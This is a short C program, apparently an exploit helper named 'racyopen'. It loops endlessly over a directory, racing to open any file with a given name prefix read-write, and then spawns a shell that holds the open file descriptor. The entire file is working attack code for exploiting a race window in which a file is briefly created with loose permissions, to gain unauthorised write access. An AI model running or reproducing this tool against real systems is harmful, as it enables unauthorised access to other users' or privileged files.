#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <dirent.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>

int main(int argc, char *argv[]) {
  if (argc != 3) { puts("invocation: ./racyopen <folder> <fileprefix>"); exit(1); }

  chdir(argv[1]);
  DIR *dir = opendir(".");
  int prefixlen = strlen(argv[2]);
  while (1) {
    struct dirent *dent;
    while ((dent = readdir(dir)) != NULL) {
      if (dent->d_name[0] == '.' && (dent->d_name[1] == '\0' || (dent->d_name[1] == '.' && dent->d_name[2] == '\0'))) continue;
      if (strncmp(dent->d_name, argv[2], prefixlen) == 0) {
        int fd = open(dent->d_name, O_RDWR);
        if (fd == -1) {
          printf("Saw a file (%s), but couldn't open it: %s\n", dent->d_name, strerror(errno));
          continue;
        }
        printf("Success! Here's your shell with open fd.\n");
        system("/bin/sh");
        printf("\nshell exited, resuming race\n");
      }
    }
    rewinddir(dir);
  }
}
